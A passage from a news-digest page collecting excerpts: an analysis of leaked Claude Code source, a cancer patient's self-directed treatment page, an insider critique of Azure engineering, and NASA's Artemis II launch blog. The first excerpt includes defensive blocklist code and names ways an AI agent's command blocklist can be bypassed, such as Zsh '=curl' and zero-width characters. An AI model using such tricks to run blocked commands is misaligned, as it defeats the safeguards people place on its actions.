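Two of those checks are easy to illustrate. In Zsh, a word beginning with “=” expands to the command’s full path, so “=curl” would dodge a naive blocklist keyed on the literal word “curl”; zero-width characters can likewise split a blocked token. The function names below are mine, not the leaked bashSecurity.ts code.

```typescript
// Strip a leading "=" so "=curl" is checked as "curl" (Zsh equals expansion).
function normalizeZshWord(word: string): string {
  return word.startsWith("=") ? word.slice(1) : word;
}

// Zero-width characters can split a blocked token, e.g. "cu\u200Brl".
function containsZeroWidthInjection(command: string): boolean {
  return /[\u200B\u200C\u200D\uFEFF]/.test(command);
}

function isBlocked(command: string, blocklist: Set<string>): boolean {
  if (containsZeroWidthInjection(command)) return true;
  return command
    .split(/\s+/)
    .some((word) => blocklist.has(normalizeZshWord(word)));
}
```

The real checks are numbered and far more thorough; the point is that each bypass class gets its own normalization pass before the permission decision.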

Prompt cache eco­nom­ics clearly drive a lot of the ar­chi­tec­ture. prompt­Cache­BreakDe­tec­tion.ts tracks 14 cache-break vec­tors, and there are sticky latches” that pre­vent mode tog­gles from bust­ing the cache. One func­tion is an­no­tated DANGEROUS_uncachedSystemPromptSection(). When you’re pay­ing for every to­ken, cache in­val­i­da­tion stops be­ing a com­puter sci­ence joke and be­comes an ac­count­ing prob­lem.
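A “sticky latch” in the assumed sense is tiny: once a cache-affecting toggle turns on during a session, it stays on, so the cached prompt prefix is never invalidated by a flip back and forth. The class and method names below are mine.

```typescript
class StickyLatch {
  private latched = false;

  // Feed the raw toggle state; get back the value the prompt should use.
  observe(rawEnabled: boolean): boolean {
    if (rawEnabled) this.latched = true; // latch on; never release mid-session
    return this.latched;
  }
}
```

The trade-off is deliberate: a slightly stale prompt section is cheaper than re-ingesting the entire cached prefix at full token price.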

The multi-agent coordinator in coordinatorMode.ts is interesting because the orchestration algorithm is a prompt, not code. It manages worker agents through system prompt instructions like “Do not rubber-stamp weak work” and “You must understand findings before directing follow-up work. Never hand off understanding to another worker.”

The code­base also has some rough spots. print.ts is 5,594 lines long with a sin­gle func­tion span­ning 3,167 lines and 12 lev­els of nest­ing. They use Axios for HTTP, which is funny tim­ing given that Axios was just com­pro­mised on npm with ma­li­cious ver­sions drop­ping a re­mote ac­cess tro­jan.

Some peo­ple are down­play­ing this be­cause Google’s Gemini CLI and OpenAI’s Codex are al­ready open source. But those com­pa­nies open-sourced their agent SDK (a toolkit), not the full in­ter­nal wiring of their flag­ship prod­uct.

The real dam­age is­n’t the code. It’s the fea­ture flags. KAIROS, the anti-dis­til­la­tion mech­a­nisms: these are prod­uct roadmap de­tails that com­peti­tors can now see and re­act to. The code can be refac­tored. The strate­gic sur­prise can’t be un-leaked.

And here’s the kicker: Anthropic ac­quired Bun at the end of last year, and Claude Code is built on top of it. A Bun bug (oven-sh/bun#28001), filed on March 11, re­ports that source maps are served in pro­duc­tion mode even though Bun’s own docs say they should be dis­abled. The is­sue is still open. If that’s what caused the leak, then Anthropic’s own tool­chain shipped a known bug that ex­posed their own pro­duc­t’s source code.

As one Twitter reply put it: “accidentally shipping your source map to npm is the kind of mistake that sounds impossible until you remember that a significant portion of the codebase was probably written by the AI you are shipping.”

...

Read the original on alex000kim.com »

6 1,279 shares, 49 trendiness

Cancer

I’ve taken agency in the treat­ment of my bone can­cer (osteosarcoma in the T5 ver­te­brae of the up­per spine). After I’ve ran out of stan­dard of care treat­ment op­tions and there were no tri­als avail­able for me I’ve started do­ing: max­i­mum di­ag­nos­tics, cre­ated new treat­ments, started do­ing treat­ments in par­al­lel, and scal­ing this for oth­ers.

Elliot Hershberg wrote a great and ex­ten­sive ar­ti­cle about my can­cer jour­ney.

My cancer journey deck is embedded below, and there is also a recording of an OpenAI Forum presentation. The companies we are building to scale this approach for others can be found at evenone.ventures. Please scroll further on this page for my data and other information.

I think the medical industry can be more patient-first; see this great article by Ruxandra: https://www.writingruxandrabio.com/p/the-bureaucracy-blocking-the-chance

For my data, please see https://osteosarc.com/, which includes my treatment timeline and a data overview doc with 25TB of publicly readable Google Cloud buckets.

Please sub­scribe to my mail­ing list

...

Read the original on sytse.com »

7 1,129 shares, 49 trendiness

How Microsoft Vaporized a Trillion Dollars

This is the first of a se­ries of ar­ti­cles in which you will learn about what may be one of the sil­li­est, most pre­ventable, and most costly mishaps of the 21st cen­tury, where Microsoft all but lost OpenAI, its largest cus­tomer, and the trust of the US gov­ern­ment.

I joined Azure Core on the dull Monday morn­ing of May 1st, 2023, as a se­nior mem­ber of the Overlake R&D team, the folks be­hind the Azure Boost of­fload card and net­work ac­cel­er­a­tor.

I was­n’t new to Azure, hav­ing run what is likely the longest-run­ning pro­duc­tion sub­scrip­tion of this cloud ser­vice, which launched in February 2010 as Windows Azure.

I wasn’t new to Microsoft either, having been part of the Windows team since 1/1/2013, having later helped migrate SharePoint Online to Azure, and having then joined the Core OS team as a kernel engineer. There, I notably helped improve the kernel and helped invent and deliver the Container platform that supports Docker, Azure Kubernetes, Azure Container Instances, Azure App Services, and Windows Sandbox, all shipping technologies that resulted in multiple granted patents.

Furthermore, I con­tributed to brain­storm­ing the early Overlake cards in 2020-2021, draft­ing a pro­posal for a Host OS Accelerator Card com­mu­ni­ca­tion pro­to­col and net­work stack, when all we had was a de­bug­ger’s se­r­ial con­nec­tion. I also served as a Core OS spe­cial­ist, help­ing Azure Core en­gi­neers di­ag­nose deep OS is­sues.

I re­joined in 2023 as an Azure ex­pert on day one, hav­ing con­tributed to the de­vel­op­ment of some of the tech­nolo­gies on which Azure re­lies and hav­ing used the plat­form for more than a decade, both out­side and in­side Microsoft at a global scale.

As a re­turn­ing em­ployee, I skipped the New Employee Orientation and had my Global Security in­vite for 12 noon to pick up my badge, but my fu­ture man­ager asked if I could come in ear­lier, as the team had their monthly plan­ning meet­ing that morn­ing.

I, of course, agreed and ar­rived a few min­utes be­fore 10 am at the en­trance of the Studio X build­ing, not far from The Commons on the West Campus in Redmond. A man showed up in the lobby and opened the door for me. I fol­lowed him to a meet­ing room through a labyrinth of cor­ri­dors.

The room was chock-full, with more peo­ple on a live con­fer­ence call. The dev man­ager, the leads, the ar­chi­tects, the prin­ci­pal and se­nior en­gi­neers shared the space with what ap­peared to be new hires and ju­nior per­son­nel.

The screen pro­jected a slide where I rec­og­nized a num­ber of fa­mil­iar acronyms, like COM, WMI, perf coun­ters, VHDX, NTFS, ETW, and a dozen oth­ers, mixed with new Azure-related ones, in an im­broglio of boxes linked by ar­rows.

I sat qui­etly at the back while a man was walk­ing the room through a big port­ing plan of their cur­rent stack to the Overlake ac­cel­er­a­tor. As I lis­tened, it was not im­me­di­ately clear what that se­ries of boxes with Windows user-mode and ker­nel com­po­nents had to do with that plan.

After a few minutes, I risked a question: “Are you planning to port those Windows features to Overlake?” The answer was yes, or at least they were looking into it. The dev manager showed some doubt, and the man replied that they could “at least ask a couple of junior devs to look into it.”

The room re­mained silent for an in­stant. I had seen the hard­ware specs for the SoC on the Overlake card in my pre­vi­ous tenure: the RAM ca­pac­ity and the power bud­get, which was just a tiny frac­tion of the TDP you can ex­pect from a reg­u­lar server CPU.

The hard­ware folks I had spo­ken with told me they could only spare 4KB of dual-ported mem­ory on the FPGA for my door­bell shared-mem­ory com­mu­ni­ca­tion pro­to­col.

Everything was nim­ble, ef­fi­cient, and power-savvy, and the team I had joined 10 min­utes ear­lier was se­ri­ously con­sid­er­ing port­ing half of Windows to that tiny, fan­less, Linux-running chip the size of a fin­ger­nail.

That felt like Elon talking about colonizing Mars: just nuke the poles, then grow an atmosphere! Easier said than done, huh?

That en­tire 122-strong org was knee-deep in im­pos­si­ble ru­mi­na­tions in­volv­ing port­ing Windows to Linux to sup­port their ex­ist­ing VM man­age­ment agents.

The man was a Principal Group Engineering Manager over­see­ing a chunk of the soft­ware run­ning on each Azure node; his boss, a Partner Engineering Manager, was in the room with us, and they re­ally con­tem­plated port­ing Windows to Linux to sup­port their cur­rent soft­ware.

At first, I ques­tioned my un­der­stand­ing. Was that se­ri­ous? The rest of the talk left no doubt: the plan was out­lined, and the dev leads were tasked with con­tribut­ing peo­ple to the ef­fort. It was im­me­di­ately clear to me that this plan would never suc­ceed and that the org needed a lot of help.

That first hour in the new role left me with a mix of strange feel­ings, stu­pe­fac­tion, and in­credulity.

The stack was hitting its scaling limits on a 400-watt Xeon at just a few dozen VMs per node, I later learned, a far cry from the 1,024-VM limit I knew the hypervisor was capable of. It was also a noisy neighbor, consuming so many resources that it caused jitter observable from the customer VMs.

There is no di­men­sion in the uni­verse where this stack would fit on a tiny ARM SoC and scale up by many fac­tors. It was not go­ing to hap­pen.

I have seen a lot in my decades of in­dus­try (and Microsoft) ex­pe­ri­ence, but I had never seen an or­ga­ni­za­tion so far from re­al­ity. My day-one prob­lem was there­fore not to ramp up on new tech­nol­ogy, but rather to con­vince an en­tire org, up to my skip-skip-level, that they were on a death march.

Deep down, I knew it was going to be a fierce uphill battle. As you can imagine, it didn’t go well, as you will see later.

I spent the next few days read­ing more about the plans, study­ing the cur­rent sys­tems, and vis­it­ing old friends in Core OS, my alma mater. I was lost away from home in a bizarre ter­ri­tory where peo­ple made plans that did­n’t make sense with the aplomb of a drunk LLM.

I no­tably spent more than 90 min­utes chat­ting in per­son with the head of the Linux System Group, a solid scholar with a PhD from INRIA, who was among the folks who hired me on the ker­nel team years ear­lier.

His org is re­spon­si­ble for de­liv­er­ing Mariner Linux (now Azure Linux) and the trimmed-down dis­tro run­ning on the Overlake / Azure Boost card. He kindly an­swered all my ques­tions, and I learned that they had iden­ti­fied 173 agents (one hun­dred sev­enty-three) as can­di­dates for port­ing to Overlake.

I later re­searched this fur­ther and found that no one at Microsoft, not a sin­gle soul, could ar­tic­u­late why up to 173 agents were needed to man­age an Azure node, what they all did, how they in­ter­acted with one an­other, what their fea­ture set was, or even why they ex­isted in the first place.

Azure sells VMs, net­work­ing, and stor­age at the core. Add ob­serv­abil­ity and ser­vic­ing, and you should be good. Everything else, SQL, K8s, AI work­loads, and what­not all build on VMs with xPU, net­work­ing, and stor­age, and the heavy lift­ing to make the magic hap­pen is done by the good Core OS folks and the hy­per­vi­sor.

How the Azure folks came up with 173 agents will prob­a­bly re­main a mys­tery, but it takes a se­ri­ous amount of mis­un­der­stand­ing to get there, and this is also how dis­as­ters are built.

Now, fathom for a second that this pile of “uncontrolled stuff” is orchestrating the VMs running Anthropic’s Claude, what’s left of OpenAI’s APIs on Azure, SharePoint Online, the government clouds, and other mission-critical infrastructure, and you’ll be close to understanding how a grain of sand in that fragile pileup can cause a global collapse, with serious National Security implications as well as potential business-ending consequences for Microsoft.

We are still far from the va­por­ized tril­lion in mar­ket cap, my let­ters to the CEO, to the Microsoft Board of Directors, and to the Cloud + AI EVP and their to­tal si­lence, the quasi-loss of OpenAI, the breach of trust with the US gov­ern­ment as pub­licly stated by the Secretary of Defense, the wasted en­gi­neer­ing ef­forts, the Rust man­date, my stint on the OpenAI bare-metal team in Azure Core, the es­cort ses­sions from China and else­where, and the de­layed fea­tures pub­licly im­plied as ship­ping since 2023, be­fore the work even be­gan.

If you’re run­ning pro­duc­tion work­loads on Azure or re­ly­ing on it for mis­sion-crit­i­cal sys­tems, this story mat­ters more than you think.

...

Read the original on isolveproblems.substack.com »

8 1,069 shares, 22 trendiness

Artemis II Launch Day Updates

Live launch day updates for NASA’s Artemis II test flight will be published on this page. All times are Eastern.

The Orion spacecraft’s SAWs (solar array wings) have fully deployed, completing a key configuration step for the Artemis II mission. Flight controllers in Houston confirmed that all four wings unfolded as planned, locking into place and beginning to draw power.

Each so­lar ar­ray wing ex­tends out­ward from the European Service Module, giv­ing Orion, named Integrity, a wingspan of roughly 63 feet when fully de­ployed. Each wing has 15,000 so­lar cells to con­vert sun­light to elec­tric­ity. The ar­rays can turn on two axes that al­low them to ro­tate and track the Sun, max­i­miz­ing power gen­er­a­tion as the space­craft changes at­ti­tude dur­ing its time in Earth or­bit and on its out­bound jour­ney to the Moon.

The next ma­jor mile­stones are the PRM (perigee raise ma­neu­ver) and ARB (apogee raise burn) that will in­crease the low­est and high­est points of the Orion space­craft’s or­bit and pre­pare the space­craft for deep‑space op­er­a­tions.

Following the burns, NASA will hold a post­launch news con­fer­ence at 9 p.m. from Kennedy Space Center in Florida. Following the news con­fer­ence, the Artemis II crew will be­gin prepa­ra­tions for Orion’s prox­im­ity op­er­a­tions demon­stra­tion. This demon­stra­tion will test the abil­ity to man­u­ally ma­neu­ver Orion rel­a­tive to an­other space­craft, in this case, the in­terim cryo­genic propul­sion stage af­ter sep­a­ra­tion.

Coverage on NASA+ will soon conclude; however, 24/7 coverage will continue on NASA’s YouTube channel. Keep following the Artemis blog for live updates of key milestones throughout the mission.

Main en­gine cut­off of the SLS (Space Launch System) core stage is com­plete, and the core stage has suc­cess­fully sep­a­rated from the in­terim cryo­genic propul­sion stage and the Orion space­craft. This marks the end of the first ma­jor propul­sion phase of the Artemis II mis­sion and the tran­si­tion to up­per‑stage op­er­a­tions.

The next ma­jor mile­stone is the de­ploy­ment of the space­craft’s SAWs (solar ar­ray wings) sched­uled to be­gin ap­prox­i­mately 18 min­utes af­ter launch. Once ex­tended, the four SAWs will pro­vide con­tin­u­ous elec­tri­cal power to the space­craft through­out its jour­ney, sup­port­ing life‑sup­port sys­tems, avion­ics, com­mu­ni­ca­tions, and on­board op­er­a­tions. Deployment is a crit­i­cal step in con­fig­ur­ing Orion for the re­main­der of its time in Earth or­bit and for the out­bound trip to the Moon.

The space­craft adapter jet­ti­son fair­ings that en­close the ser­vice mod­ule and the launch abort sys­tem have sep­a­rated from the Orion space­craft. With the rocket and space­craft now fly­ing above the dens­est lay­ers of Earth’s at­mos­phere, Orion no longer re­quires the pro­tec­tive struc­tures that shielded it dur­ing the early, high‑dy­namic‑pres­sure por­tion of launch.

The next ma­jor mile­stone is core stage sep­a­ra­tion and Interim Cryogenic Propulsion Stage ig­ni­tion.

The SLS (Space Launch System) twin solid rocket boost­ers have sep­a­rated. The boost­ers, each stand­ing 177 feet tall and gen­er­at­ing more than 3.6 mil­lion pounds of thrust at liftoff, pro­vide most of the rock­et’s power dur­ing the first two min­utes of flight and sep­a­ra­tion re­duces mass and al­lows the core stage to con­tinue pro­pelling the Orion space­craft, named Integrity, to­ward or­bit.

With the boost­ers now clear, the SLS core stage re­mains the pri­mary source of thrust.

In about one minute, the space­craft adapter jet­ti­son fair­ings that en­close Orion’s ser­vice mod­ule and the launch abort sys­tem will sep­a­rate from the space­craft.

6:35 p.m.

NASA’s Artemis II SLS (Space Launch System) rocket, with the Orion spacecraft atop car­ry­ing NASA as­tro­nauts Reid Wiseman, Victor Glover, and Christina Koch, along with CSA (Canadian Space Agency) as­tro­naut Jeremy Hansen, lifted off from Kennedy Space Center’s Launch Complex 39B in Florida at 6:35 p.m. EDT to be­gin its jour­ney to deep space.

The twin solid rocket boosters ignited first, delivering more than 75% of the thrust needed to lift the 5.75-million-pound rocket off the pad. Their combined power, along with the four RS-25 engines already at full thrust, generated an incredible 8.8 million pounds of force at liftoff. As the rocket rose, the umbilicals, which provided power, fuel, and data connections during prelaunch, disconnected and retracted into protective housings. This ensured the vehicle was free from ground systems and fully autonomous for flight.

The approximately 10-day Artemis II mission around the Moon is the first crewed flight under NASA’s Artemis campaign. It will help test the systems and hardware needed to continue sending astronauts on increasingly difficult missions to explore more of the Moon for scientific discovery and economic benefits, and to continue building toward the first crewed missions to Mars.

Below are the as­cent mile­stones that will oc­cur lead­ing up to core stage sep­a­ra­tion. Times may vary by sev­eral sec­onds.

The Artemis II count­down has en­tered ter­mi­nal count, and the ground launch se­quencer has taken con­trol, or­ches­trat­ing a pre­cise se­ries of au­to­mated com­mands to pre­pare the SLS (Space Launch System) rocket and Orion space­craft for liftoff at a T-0 time of 6:35 p.m. EDT.

The ground launch se­quencer en­sures that all sys­tems – from propul­sion to avion­ics – tran­si­tion into flight mode. Key ac­tions per­formed in­clude pres­sur­iz­ing pro­pel­lant tanks for op­ti­mal en­gine per­for­mance, ac­ti­vat­ing flight soft­ware and switch­ing con­trol from ground to on­board sys­tems, and per­form­ing fi­nal health checks across thou­sands of sen­sors to con­firm readi­ness.

This au­to­mated se­quence min­i­mizes hu­man in­ter­ven­tion, re­duc­ing risk and en­sur­ing syn­chro­niza­tion across com­plex sub­sys­tems. For Artemis II, this mo­ment marks the cul­mi­na­tion of years of plan­ning and test­ing, as the mis­sion moves from ground op­er­a­tions to the thresh­old of launch.

See the list be­low of the ter­mi­nal count mile­stones:

* T-4M — GLS is go for core stage aux­il­iary power unit (APU) start

Inside the ter­mi­nal count­down, teams have a few op­tions to hold the count if needed.

The launch team can hold at 6 min­utes for the du­ra­tion of the launch win­dow, less the 6 min­utes needed to launch, with­out hav­ing to re­cy­cle back to 10 min­utes.

If teams need to stop the clock be­tween T-6 min­utes and T-1 minute, 30 sec­onds, they can hold for up to 3 min­utes and re­sume the clock to launch. If they re­quire more than 3 min­utes of hold time, the count­down would re­cy­cle back to T-10.

If the clock stops af­ter T-1 minute and 30 sec­onds, but be­fore the au­to­mated launch se­quencer takes over, then teams can re­cy­cle back to T-10 to try again, pro­vided there is ad­e­quate launch win­dow re­main­ing.

After han­dover to the au­to­mated launch se­quencer, any is­sue that would stop the count­down would lead to con­clud­ing the launch at­tempt for that day.

Artemis II Launch Director Charlie Blackwell-Thompson conducted one of the most important steps before liftoff: the “go/no-go” poll for the team to proceed with the final 10 minutes of the countdown, known as terminal count.

A unanimous “go” across the board signals that Artemis II is fully prepared to proceed toward launch. This moment represents the culmination of years of planning and hours of meticulous pre-launch work, bringing the mission to the threshold of history.

The launch team has made the decision to extend the T-10 minute hold ahead of today’s launch to give engineers time to work through final preparations for liftoff. There is a two-hour window in which Artemis II could launch, and a new liftoff time will be set shortly.

NASA’s Artemis II closeout crew completed its final tasks and departed Launch Complex 39B at NASA’s Kennedy Space Center in Florida. After hours of meticulous work assisting the astronauts with suit-up, hatch closure, and critical spacecraft checks, the team exited the White Room and left the Orion spacecraft sealed and ready for flight.

This de­par­ture marks a ma­jor tran­si­tion in launch op­er­a­tions: the space­craft is now fully con­fig­ured, and re­spon­si­bil­ity shifts to the launch con­trol team for the fi­nal count­down. The close­out crew’s pre­ci­sion and ex­per­tise en­sure that every con­nec­tion, seal, and sys­tem is ver­i­fied be­fore they step away – mak­ing this mo­ment a key mile­stone on the path to liftoff.

Engineers in­ves­ti­gated a sen­sor on the launch abort sys­tem’s at­ti­tude con­trol mo­tor con­troller bat­tery that showed a higher tem­per­a­ture than would be ex­pected. It is be­lieved to be an in­stru­men­ta­tion is­sue and will not af­fect to­day’s launch.

The weather con­tin­ues to co­op­er­ate and has now been up­graded to 90% go for launch.

Engineers have now resolved an issue with the hardware that communicates with the flight termination system. The issue would have prevented the ground from sending a signal to destruct the rocket if it were to veer off course during ascent, a capability required to protect public safety. A confidence test was performed to ensure that the hardware is ready to support today’s launch.

Meanwhile, tech­ni­cians have com­pleted the launch abort sys­tem hatch clo­sure – an es­sen­tial step that en­sures the Orion space­craft is fully sealed and ready for flight. The hatch pro­vides an ad­di­tional pro­tec­tive bar­rier for the crew mod­ule, de­signed to safe­guard as­tro­nauts dur­ing the Artemis II flight path and, if nec­es­sary, en­able a rapid es­cape in the event of an emer­gency.

During this phase, the close­out team ver­i­fies hatch align­ment, en­gages lock­ing mech­a­nisms, and con­firms pres­sure in­tegrity. These checks guar­an­tee that the launch abort sys­tem hatch can per­form its func­tion flaw­lessly, main­tain­ing struc­tural in­tegrity un­der ex­treme launch con­di­tions. With the hatch se­cured, Orion en­ters its fi­nal con­fig­u­ra­tion for liftoff, mark­ing one of the last ma­jor mile­stones be­fore fu­el­ing and launch.

Although the count­down to to­day’s Artemis II launch is con­tin­u­ing to progress, the Eastern Range has iden­ti­fied an is­sue that they are cur­rently work­ing to re­solve re­lated to their com­mu­ni­ca­tion with the flight ter­mi­na­tion sys­tem. The flight ter­mi­na­tion sys­tem is a safety sys­tem that al­lows en­gi­neers on the ground to send a sig­nal to de­struct the rocket if it were to veer off course dur­ing as­cent, to pro­tect pub­lic safety. Without as­sur­ance that this sys­tem would work if needed, to­day’s launch would be no-go. However, en­gi­neers have de­vised a way to ver­ify the sys­tem and are cur­rently prepar­ing to test this so­lu­tion.

Technicians be­gan in­stalling the crew mod­ule hatch ser­vice panel on the Orion space­craft, an im­por­tant step in fi­nal launch prepa­ra­tions. This panel pro­tects key con­nec­tions and en­sures the hatch area is se­cure for flight.

As part of cur­rent close­out ac­tiv­i­ties, teams are con­firm­ing all sys­tems around the hatch are prop­erly sealed and ready for the mis­sion.

With the hatch area secured, teams will continue final checks and countdown operations at Launch Pad 39B at NASA’s Kennedy Space Center in Florida, bringing us closer to sending astronauts on a historic journey around the Moon.

NASA en­gi­neers have con­ducted coun­ter­bal­ance mech­a­nism op­er­a­tions and are now per­form­ing hatch seal pres­sure de­cay checks in­side the White Room at Launch Complex 39B. These steps en­sure Orion’s hatch main­tains proper pres­sure in­tegrity and that the coun­ter­bal­ance sys­tem func­tions as de­signed for launch con­di­tions.

The coun­ter­bal­ance mech­a­nism is a pre­ci­sion-en­gi­neered as­sem­bly that off­sets the weight of the crew mod­ule hatch, al­low­ing tech­ni­cians to open and close it smoothly with­out in­tro­duc­ing stress on the hinge or seal. This sys­tem uses cal­i­brated springs and dampers to main­tain align­ment and pre­vent sud­den move­ments, which is es­sen­tial for pre­serv­ing the hatch’s air­tight seal. During this phase, tech­ni­cians ver­ify the mech­a­nis­m’s load dis­tri­b­u­tion and con­firm that its lock­ing fea­tures en­gage cor­rectly un­der sim­u­lated launch loads.

Following these ad­just­ments, the team per­forms seal pres­sur­iza­tion de­cay checks – mon­i­tor­ing pres­sure loss over time to con­firm the hatch’s in­tegrity. These checks are vi­tal for as­tro­naut safety, en­sur­ing the cabin re­mains se­cure in all mis­sion phases.

NASA’s Artemis II closeout crew is now completing one of the most critical steps before launch: preparing and closing the crew module hatch to the Orion spacecraft. Inside the White Room at Launch Complex 39B, the closeout crew is working meticulously to inspect seals, secure fasteners, and verify that the hatch is airtight.

This process en­sures Orion is fully pres­sur­ized and ready for flight. Once the hatch is closed and locked, the as­tro­nauts are of­fi­cially sealed in­side their space­craft, mark­ing a ma­jor mile­stone on the path to liftoff.

NASA’s Artemis II crew members are boarding the agency’s Orion spacecraft to begin communication checks to confirm voice links with mission control and onboard systems.

Before entering the spacecraft that will be their home on the approximately 10-day journey around the Moon and back, all four crewmates signed the inside of the White Room, an area at the end of the crew access arm that provides access to the spacecraft. The term “White Room” dates to NASA’s Gemini program, and to honor this human spaceflight tradition, the room remains white today.

The Artemis II closeout crew is now work­ing to help the as­tro­nauts en­ter the Orion space­craft and make fi­nal prepa­ra­tions for their nearly 700,000-mile trip to the Moon and back. As part of the process, the close­out crew is help­ing the as­tro­nauts don their Orion Crew Survival System helmets and gloves, as well as board Orion and get buck­led in.

A short time from now, the close­out crew will close the crew mod­ule and ex­te­rior launch abort sys­tem hatches. Even a sin­gle strand of hair in­side the hatch doors could po­ten­tially pose is­sues with clos­ing ei­ther hatch, so the process is care­fully done and takes up to four hours. Each step in the close­out process en­sures air­tight seals and com­mu­ni­ca­tion readi­ness for the mis­sion ahead.

Following com­mu­ni­ca­tion checks, the team per­formed suit leak checks – a vi­tal safety pro­ce­dure en­sur­ing each pres­sure suit main­tains in­tegrity in case of cabin de­pres­sur­iza­tion. These op­er­a­tions are es­sen­tial for crew readi­ness and mis­sion as­sur­ance, mark­ing one of the fi­nal phases be­fore hatch clo­sure and launch prepa­ra­tions.

With assistance from the close­out crew, the Artemis II crew are care­fully don­ning their hel­mets and gloves – fi­nal­iz­ing suit in­tegrity checks be­fore board­ing the Orion space­craft.

This step is more than cer­e­mo­nial; it en­sures air­tight seals and com­mu­ni­ca­tion readi­ness for the mis­sion ahead. The close­out crew plays a vi­tal role, guid­ing the as­tro­nauts through these pro­ce­dures and con­firm­ing every con­nec­tion is se­cure be­fore hatch clo­sure.

Stay tuned as we con­tinue to fol­low the Artemis II team through each count­down mile­stone on their path to liftoff.

NASA’s Artemis II crew, NASA astronauts Reid Wiseman, Victor Glover, and Christina Koch, along with CSA (Canadian Space Agency) astronaut Jeremy Hansen, arrived at Launch Complex 39B at the agency’s Kennedy Space Center in Florida, where the agency’s SLS (Space Launch System) rocket with the Orion spacecraft atop stands ready for launch. The opening of today’s launch window is slated for just over 4 hours from now, at 6:24 p.m. EDT.

In the next few min­utes, the crew will take the el­e­va­tor up the pad’s fixed ser­vice struc­ture and walk down the cli­mate-con­trolled crew ac­cess arm to the White Room, their fi­nal stop be­fore climb­ing aboard their Orion space­craft. In this clean, con­trolled en­vi­ron­ment at the end of the crew ac­cess arm, the close­out crew will as­sist the as­tro­nauts with hatch op­er­a­tions and ver­ify that all safety sys­tems are ready for launch.

Since the late 1960s, pads A and B at Kennedy’s Launch Complex 39 have supported America’s major space programs, with Pad A used most frequently for launches under the Space Shuttle Program. After the retirement of the shuttle in 2011, Pad A helped usher in a new era of human spaceflight as the launch pad for the agency’s Commercial Crew Program, which returned human spaceflight capability to the United States. Pad B saw the launch of NASA’s Artemis I mission in November 2022 and will continue to be the primary launch pad for America’s efforts to return humans to the Moon.

Just moments ago, NASA’s Artemis II flight crew began the walk that every NASA astronaut has made since Apollo 7 in 1968, heading to the elevator and down through the double doors below the Neil A. Armstrong Building’s Astronaut Crew Quarters at NASA’s Kennedy Space Center in Florida.

Before they left the suit-up room, the crew com­pleted one last piece of un­fin­ished busi­ness — a card game. A long-held space­flight tra­di­tion, NASA crews play cards be­fore leav­ing the crew quar­ters ahead of launch un­til the com­man­der, in this in­stance NASA as­tro­naut Reid Wiseman, loses. It is hoped that by los­ing, the com­man­der burns off all his or her bad luck, thereby clear­ing the mis­sion for only good luck.

NASA’s Artemis II is the first crewed mission of the Artemis program and will carry Wiseman and fellow NASA astronauts Victor Glover and Christina Koch, as well as CSA (Canadian Space Agency) astronaut Jeremy Hansen, on an approximately 10-day mission around the Moon and back to Earth.

The first crewed deep-space flight in over 50 years, Artemis II is ex­pected to send the crew far­ther from Earth than any pre­vi­ous hu­man mis­sion, po­ten­tially break­ing the record of about 248,655 miles (400,171 km) from Earth set by Apollo 13 dur­ing its lu­nar free-re­turn tra­jec­tory. This mile­stone will oc­cur dur­ing the lu­nar flyby phase, when the crew trav­els on a free-re­turn tra­jec­tory around the Moon, which al­lows the space­craft to loop around the Moon and re­turn to Earth with­out en­ter­ing lu­nar or­bit.
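The two record figures quoted above can be checked against each other; a minimal sketch (the distances are NASA's, the conversion factor is the standard definition of the international mile):

```python
# Sanity-check the Apollo 13 distance record quoted above:
# 248,655 miles should correspond to about 400,171 km.
KM_PER_MILE = 1.609344  # exact, by definition of the international mile

miles = 248_655
km = miles * KM_PER_MILE
print(round(km))  # 400171
```

The rounded result matches the kilometer figure given in the article.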

During the test flight, NASA will test life-sup­port sys­tems and crit­i­cal op­er­a­tions in deep space, paving the way for fu­ture lu­nar land­ings and Mars ex­plo­ration.

Having received good­byes and well wishes from their fam­i­lies and friends, the crew em­barks on the 20-minute jour­ney to Kennedy’s Launch Pad 39B and their await­ing space­craft.

NASA's pad rescue and closeout crew teams have arrived at Launch Complex 39B at the agency's Kennedy Space Center in Florida to ensure safety and readiness during the critical fueling operations. These specialized teams play a vital role in protecting personnel and hardware throughout the countdown.

The pad res­cue team will be po­si­tioned to re­spond im­me­di­ately in the un­likely event of an emer­gency, en­sur­ing safe evac­u­a­tion pro­ce­dures for pad per­son­nel. The res­cue team is equipped with ad­vanced gear and trained for rapid crew ex­trac­tion, fire sup­pres­sion, and haz­ard mit­i­ga­tion. Their pres­ence en­sures as­tro­naut safety re­mains the top pri­or­ity, pro­vid­ing an all-im­por­tant layer of pro­tec­tion as fu­el­ing op­er­a­tions and sys­tem checks con­tinue.

The closeout crew is re­spon­si­ble for clos­ing the Orion crew mod­ule and launch abort sys­tem hatches, se­cur­ing ac­cess points, ver­i­fy­ing pad con­fig­u­ra­tions, and main­tain­ing the in­tegrity of the launch area dur­ing pro­pel­lant load­ing and sys­tem checks. Their work is crit­i­cal for guar­an­tee­ing a se­cure en­vi­ron­ment for the as­tro­nauts be­fore the launch pad is cleared for liftoff op­er­a­tions.

These teams are essential for mitigating risk and supporting the complex choreography of Artemis II's prelaunch activities. With both teams in place, Artemis II remains on track for its historic mission to send astronauts around the Moon.

NASA as­tro­nauts Reid Wiseman, com­man­der; Victor Glover, pi­lot; and Christina Koch, mis­sion spe­cial­ist; along with CSA (Canadian Space Agency) as­tro­naut Jeremy Hansen, mis­sion spe­cial­ist, are suit­ing up in­side the Astronaut Crew Quarters of the Neil A. Armstrong Operations and Checkout Building at the agen­cy’s Kennedy Space Center in Florida.

A team of suit technicians helps the crew put on their Orion Crew Survival System suits, each tailored for mobility and comfort while ensuring maximum safety during the dynamic phases of flight. The bright orange spacesuits are designed to protect the astronauts on their journey and feature many improvements, from head to toe, over the suits worn on the space shuttle. NASA reengineered many elements to improve safety and range of motion for Artemis astronauts, and instead of the small, medium, and large sizes of the shuttle era, the suits are custom fit for each crew member.

The outer layer is fire-re­sis­tant, and a stronger zip­per al­lows as­tro­nauts to quickly put the suit on. Improved ther­mal man­age­ment will help keep them cool and dry. A lighter, stronger hel­met im­proves com­fort and com­mu­ni­ca­tion, and the gloves are more durable and touch-screen com­pat­i­ble. Better-fitting boots also pro­vide pro­tec­tion in the case of fire and help an as­tro­naut move more swiftly.

The suits’ de­sign and en­gi­neer­ing en­hance­ments pro­vide an ad­di­tional layer of pro­tec­tion for as­tro­nauts and en­sure they re­turn home safely from deep space mis­sions.

During suit-up, teams will check for leaks and en­sure that all con­nect­ing life sup­port sys­tems, in­clud­ing air and power, are op­er­at­ing nom­i­nally ahead of the crew’s ride to NASA Kennedy’s Launch Complex 39B.

